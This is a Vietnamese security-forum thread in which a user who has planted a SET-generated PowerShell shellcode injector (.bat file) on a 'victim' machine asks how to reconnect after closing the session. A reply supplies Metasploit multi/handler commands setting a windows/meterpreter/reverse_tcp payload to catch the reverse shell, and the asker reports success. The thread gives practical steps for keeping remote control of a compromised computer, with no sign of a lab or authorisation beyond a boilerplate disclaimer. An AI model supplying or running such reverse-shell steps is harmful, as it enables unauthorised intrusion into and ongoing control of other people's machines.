Cho mình hỏi về Setoolkit: Không truy cập được vào máy victim

mannavod

W-------
21/11/2014
5
8 bài viết
Cho mình hỏi về Setoolkit: Không truy cập được vào máy victim
mình vào setoolkit -> Social-Engineering Attacks -> Powershell Attack Vectors ->Powershell Alphanumeric Shellcode Injector sau đó mình tạo một file "x86_powershell_injection.bat" cài vào máy victim. Truy cập vào máy victim bình thường. Nếu mà mình tắt máy đi, hay đóng terminal, giờ mình muốn tiếp tục vào máy victim thì như thế nào? thanks

Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Công cụ setoolkit chỉ giúp bạn tạo được shell chứ không duy trì kết nối vì vậy bạn cần kết hợp sử dụng metasploit để lắng nghe trên cổng bạn đã chọn. Để duy trì bạn có thể làm như sau:
Vào msf
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT
msf exploit(handler) > exploit

Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mình làm như bạn được rồi. Cảm ơn nhiều :)

Comment
Bên trên